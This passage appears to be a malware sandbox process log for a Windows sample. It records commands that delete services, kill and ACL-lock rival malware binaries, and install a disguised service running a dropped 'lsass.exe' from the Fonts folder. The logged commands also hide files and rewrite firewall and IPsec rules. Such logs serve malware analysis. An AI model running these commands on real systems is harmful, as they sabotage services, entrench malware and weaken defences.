PID:688

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
- Views/modifies file attributes
PID:316

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
3⤵
PID:568

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
2⤵
PID:956

C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
2⤵
- Launches sc.exe
PID:1324

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:1704

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
PID:1236

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:368

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
- Launches sc.exe
PID:520

C:\Windows\SysWOW64\net.exe
net stop ServiceSaims
2⤵
PID:580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceSaims
3⤵
PID:360

C:\Windows\SysWOW64\sc.exe
sc delete ServiceSaims
2⤵
- Launches sc.exe
PID:1792

C:\Windows\SysWOW64\net.exe
net stop ServiceSais
2⤵
PID:1764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceSais
3⤵
PID:1808

C:\Windows\SysWOW64\sc.exe
sc delete ServiceSais
2⤵
- Launches sc.exe
PID:1956

C:\Windows\SysWOW64\net.exe
net stop HostManger
2⤵
PID:1628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HostManger
3⤵
PID:2036

C:\Windows\SysWOW64\sc.exe
sc delete HostManger
2⤵
- Launches sc.exe
PID:1580

C:\Windows\SysWOW64\net.exe
net stop Hostserver
2⤵
PID:1976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Hostserver
3⤵
PID:956

C:\Windows\SysWOW64\sc.exe
sc delete Hostserver
2⤵
- Launches sc.exe
PID:1724

C:\Windows\SysWOW64\net.exe
net stop ServiceMaims
2⤵
PID:904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceMaims
3⤵
PID:812

C:\Windows\SysWOW64\sc.exe
sc delete ServiceMaims
2⤵
- Launches sc.exe
PID:1844

C:\Windows\SysWOW64\net.exe
net stop ServicesMain
2⤵
PID:1300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServicesMain
3⤵
PID:836

C:\Windows\SysWOW64\sc.exe
sc delete ServicesMain
2⤵
- Launches sc.exe
PID:1412

C:\Windows\SysWOW64\net.exe
net stop FormManger
2⤵
PID:848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FormManger
3⤵
PID:2008

C:\Windows\SysWOW64\sc.exe
sc delete FormManger
2⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net stop Famserver
2⤵
PID:1500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Famserver
3⤵
PID:772

C:\Windows\SysWOW64\net.exe
net stop RpcEptManger
2⤵
PID:1296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RpcEptManger
3⤵
PID:1416

C:\Windows\SysWOW64\sc.exe
sc delete Famserver
2⤵
- Launches sc.exe
PID:1264

C:\Windows\SysWOW64\sc.exe
sc delete RpcEptManger
2⤵
- Launches sc.exe
PID:520

C:\Windows\SysWOW64\net.exe
net stop samserver
2⤵
PID:1996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop samserver
3⤵
PID:980

C:\Windows\SysWOW64\sc.exe
sc delete samserver
2⤵
- Launches sc.exe
PID:276

C:\Windows\SysWOW64\net.exe
net stop WinNsaSrv
2⤵
PID:1336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinNsaSrv
3⤵
PID:1036

C:\Windows\SysWOW64\sc.exe
sc delete WinNsaSrv
2⤵
- Launches sc.exe
PID:880

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe
2⤵
- Executes dropped EXE
PID:1164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:664

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger
2⤵
- Executes dropped EXE
PID:1492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start HostManger
2⤵
- Executes dropped EXE
PID:1868

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\windows\hosts1.bat
2⤵
PID:1936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2004

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system
3⤵
PID:1760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1332

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system
3⤵
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2028

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system
3⤵
PID:1480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\seser.exe /p everyone:n /d system
3⤵
PID:604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1260

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system
3⤵
PID:1160

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2244

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2316

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2392

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\ProgramData\vmicvess\svchost.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2484

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system
3⤵
PID:2500

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2728

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2844

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
3⤵
PID:2852

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2872

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2972

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2152

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\fonts\help\services.exe /p everyone:n /d system
3⤵
PID:2124

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2328

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system
3⤵
PID:2344

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2436

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\temp\conhost.exe /p everyone:n /d system
3⤵
PID:2420

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2468

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2640

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\debug\lsmose.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:2696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\debug\lsmose.exe /p everyone:n /d system
3⤵
PID:2740

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2588

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2744

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1444

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2636

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2888

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\windows\debug\services.exe
3⤵
- Sets file to hidden
PID:2132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1372

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\debug\services.exe /p everyone:n /d system
3⤵
PID:2156

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2112

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\windows\debug\svchost.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:3036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1652

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\debug\svchost.exe /p everyone:n /d system
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1100

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
3⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3068

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system
3⤵
PID:1988

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system
3⤵
PID:2976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1704

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1996

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2164

C:\Windows\SysWOW64\cacls.exe
cacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system
3⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2256

C:\Windows\SysWOW64\cacls.exe
cacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system
3⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\windows\hosts.bat
2⤵
PID:1588

C:\Windows\SysWOW64\sc.exe
sc stop COMSysCts
3⤵
- Launches sc.exe
PID:1992

C:\Windows\SysWOW64\sc.exe
sc delete COMSysCts
3⤵
- Launches sc.exe
PID:1716

C:\Windows\SysWOW64\sc.exe
sc stop WmSrv
3⤵
PID:956

C:\Windows\SysWOW64\sc.exe
sc delete WmSrv
3⤵
PID:1052

C:\Windows\SysWOW64\sc.exe
sc stop WmiAppSrv
3⤵
- Launches sc.exe
PID:1112

C:\Windows\SysWOW64\sc.exe
sc delete WmiAppSrv
3⤵
- Launches sc.exe
PID:812

C:\Windows\SysWOW64\sc.exe
sc stop "RegCsv COMSysApp"
3⤵
- Launches sc.exe
PID:1412

C:\Windows\SysWOW64\sc.exe
sc delete "RegCsv COMSysApp"
3⤵
PID:836

C:\Windows\SysWOW64\sc.exe
sc stop hasplms
3⤵
- Launches sc.exe
PID:1704

C:\Windows\SysWOW64\sc.exe
sc delete hasplms
3⤵
- Launches sc.exe
PID:524

C:\Windows\SysWOW64\sc.exe
sc stop hasp1ms
3⤵
PID:696

C:\Windows\SysWOW64\sc.exe
sc delete hasp1ms
3⤵
- Launches sc.exe
PID:1236

C:\Windows\SysWOW64\sc.exe
sc stop serviceing
3⤵
- Launches sc.exe
PID:772

C:\Windows\SysWOW64\sc.exe
sc delete serviceing
3⤵
- Launches sc.exe
PID:848

C:\Windows\SysWOW64\sc.exe
sc stop SQLWriter$
3⤵
- Launches sc.exe
PID:1464

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter$
3⤵
- Launches sc.exe
PID:2016

C:\Windows\SysWOW64\sc.exe
sc stop IPSECS
3⤵
- Launches sc.exe
PID:360

C:\Windows\SysWOW64\sc.exe
sc delete IPSECS
3⤵
- Launches sc.exe
PID:1888

C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftFonts
3⤵
- Launches sc.exe
PID:1716

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftFonts
3⤵
PID:1668

C:\Windows\SysWOW64\sc.exe
sc stop Microsoft_Update
3⤵
- Launches sc.exe
PID:1544

C:\Windows\SysWOW64\sc.exe
sc delete Microsoft_Update
3⤵
- Launches sc.exe
PID:1788

C:\Windows\SysWOW64\sc.exe
sc stop "Help Service"
3⤵
PID:1552

C:\Windows\SysWOW64\sc.exe
sc delete "Help Service"
3⤵
- Launches sc.exe
PID:1264

C:\Windows\SysWOW64\sc.exe
sc stop vmicvess
3⤵
- Launches sc.exe
PID:1060

C:\Windows\SysWOW64\sc.exe
sc delete vmicvess
3⤵
- Launches sc.exe
PID:1700

C:\Windows\SysWOW64\sc.exe
sc stop SSDPSRVS
3⤵
- Launches sc.exe
PID:1764

C:\Windows\SysWOW64\sc.exe
sc delete SSDPSRVS
3⤵
- Launches sc.exe
PID:2020

C:\Windows\SysWOW64\sc.exe
sc stop superproservert
3⤵
PID:1832

C:\Windows\SysWOW64\sc.exe
sc delete superproservert
3⤵
- Launches sc.exe
PID:1260

C:\Windows\SysWOW64\sc.exe
sc stop Bcdefg
3⤵
- Launches sc.exe
PID:1800

C:\Windows\SysWOW64\sc.exe
sc delete Bcdefg
3⤵
- Launches sc.exe
PID:1544

C:\Windows\SysWOW64\sc.exe
sc stop ctfnom
3⤵
PID:1552

C:\Windows\SysWOW64\sc.exe
sc delete ctfnom
3⤵
PID:2028

C:\Windows\SysWOW64\sc.exe
sc stop ClipBooks
3⤵
PID:1480

C:\Windows\SysWOW64\net.exe
net stop "MicrosoftFonts"
3⤵
PID:1716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MicrosoftFonts"
4⤵
PID:2004

C:\Windows\SysWOW64\net.exe
net stop MicrosoftFonts
3⤵
PID:2004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MicrosoftFonts
4⤵
PID:1716

C:\Windows\SysWOW64\net.exe
net stop "Framework"
3⤵
PID:2056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Framework"
4⤵
PID:2068

C:\Windows\SysWOW64\net.exe
net stop Servicing
3⤵
PID:2088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Servicing
4⤵
PID:2108

C:\Windows\SysWOW64\sc.exe
sc stop cefragsvc
3⤵
PID:2128

C:\Windows\SysWOW64\sc.exe
sc delete cefragsvc
3⤵
- Launches sc.exe
PID:2140

C:\Windows\SysWOW64\sc.exe
sc stop Microsoft.NET_Framework_NGEN
3⤵
- Launches sc.exe
PID:2156

C:\Windows\SysWOW64\sc.exe
sc delete Microsoft.NET_Framework_NGEN
3⤵
- Launches sc.exe
PID:2208

C:\Windows\SysWOW64\sc.exe
sc stop natiodnal
3⤵
- Launches sc.exe
PID:2220

C:\Windows\SysWOW64\sc.exe
sc delete natiodnal
3⤵
- Launches sc.exe
PID:2232

C:\Windows\SysWOW64\sc.exe
sc stop wbzxqk
3⤵
PID:2276

C:\Windows\SysWOW64\sc.exe
sc delete wbzxqk
3⤵
PID:2288

C:\Windows\SysWOW64\sc.exe
sc stop hidserv
3⤵
- Launches sc.exe
PID:2300

C:\Windows\SysWOW64\sc.exe
sc delete hidserv
3⤵
- Launches sc.exe
PID:2324

C:\Windows\SysWOW64\sc.exe
sc stop NetASDlogon
3⤵
- Launches sc.exe
PID:2340

C:\Windows\SysWOW64\sc.exe
sc delete NetASDlogon
3⤵
- Launches sc.exe
PID:2368

C:\Windows\SysWOW64\sc.exe
sc stop "BITS lsm"
3⤵
PID:2380

C:\Windows\SysWOW64\sc.exe
sc delete "BITS lsm"
3⤵
- Launches sc.exe
PID:2404

C:\Windows\SysWOW64\sc.exe
sc stop endpointrpc
3⤵
PID:2428

C:\Windows\SysWOW64\sc.exe
sc delete endpointrpc
3⤵
- Launches sc.exe
PID:2448

C:\Windows\SysWOW64\sc.exe
sc stop "MYSQL Input Service Name"
3⤵
- Launches sc.exe
PID:2464

C:\Windows\SysWOW64\sc.exe
sc delete "MYSQL Input Service Name"
3⤵
- Launches sc.exe
PID:2492

C:\Windows\SysWOW64\sc.exe
sc delete csrss
3⤵
- Launches sc.exe
PID:2712

C:\Windows\SysWOW64\sc.exe
sc stop csrss
3⤵
PID:2524

C:\Windows\SysWOW64\sc.exe
sc stop gupdate
3⤵
- Launches sc.exe
PID:2796

C:\Windows\SysWOW64\sc.exe
sc delete gupdate
3⤵
- Launches sc.exe
PID:2824

C:\Windows\SysWOW64\sc.exe
sc stop gupdatem
3⤵
- Launches sc.exe
PID:2880

C:\Windows\SysWOW64\sc.exe
sc delete gupdatem
3⤵
- Launches sc.exe
PID:2892

C:\Windows\SysWOW64\sc.exe
sc stop wmiApSrvs
3⤵
- Launches sc.exe
PID:2920

C:\Windows\SysWOW64\sc.exe
sc delete wmiApSrvs
3⤵
- Launches sc.exe
PID:2936

C:\Windows\SysWOW64\sc.exe
sc stop snmpstorsrv
3⤵
- Launches sc.exe
PID:2948

C:\Windows\SysWOW64\sc.exe
sc delete snmpstorsrv
3⤵
PID:2960

C:\Windows\SysWOW64\sc.exe
sc delete "MicrosoftFonts"
3⤵
- Launches sc.exe
PID:2984

C:\Windows\SysWOW64\sc.exe
sc stop serviceing
3⤵
- Launches sc.exe
PID:3000

C:\Windows\SysWOW64\sc.exe
sc delete Servicing
3⤵
- Launches sc.exe
PID:3024

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftFonts
3⤵
- Launches sc.exe
PID:624

C:\Windows\SysWOW64\sc.exe
sc stop WmiAppSrv
3⤵
- Launches sc.exe
PID:1644

C:\Windows\SysWOW64\sc.exe
sc delete WmiAppSrv
3⤵
- Launches sc.exe
PID:696

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im runhost.exe
3⤵
- Kills process with taskkill
PID:1804

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundllhost.exe
3⤵
- Kills process with taskkill
PID:1892

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dlllhost.exe
3⤵
- Kills process with taskkill
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2280

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system
3⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2248

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system
3⤵
PID:2312

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2340

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2472

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system\lsmsm.exe /p everyone:n /d system
3⤵
PID:2496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\mysql.log /p everyone:n /d system
3⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2672

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system\lsaus.exe /p everyone:n /d system
3⤵
PID:2684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\srvany.exe /p everyone:n /d system
3⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2724

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\splwow64.exe /d everyone
3⤵
PID:2708

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2748

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:2784

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im tasksche.exe
3⤵
- Kills process with taskkill
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\tasksche.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:3052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\tasksche.exe /d everyone
3⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1932

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\help\csrss.exe /p everyone:n /d system
3⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:812

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\help\www.exe /p everyone:n /d system
3⤵
PID:1752

C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
3⤵
PID:1516

C:\Windows\SysWOW64\net.exe
net start MpsSvc
3⤵
PID:1888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
4⤵
PID:1416

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
- Modifies Windows Firewall
PID:2892

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
3⤵
- Modifies Windows Firewall
PID:2912

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
3⤵
- Modifies Windows Firewall
PID:3008

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
3⤵
- Modifies Windows Firewall
PID:2616

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=win
3⤵
PID:2156

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:2144

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:2008

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:916

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:1644

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:3048

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:2992

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:2972

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:2208

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:2172

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
3⤵
PID:1276

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=win assign=y
3⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
3⤵
PID:2300

C:\Windows\SysWOW64\find.exe
find "5.1."
3⤵
PID:2264

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
- Deletes itself
PID:1336

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:880

\??\c:\windows\Fonts\lsass.exe
"c:\windows\Fonts\lsass.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1760

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:1488

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1116

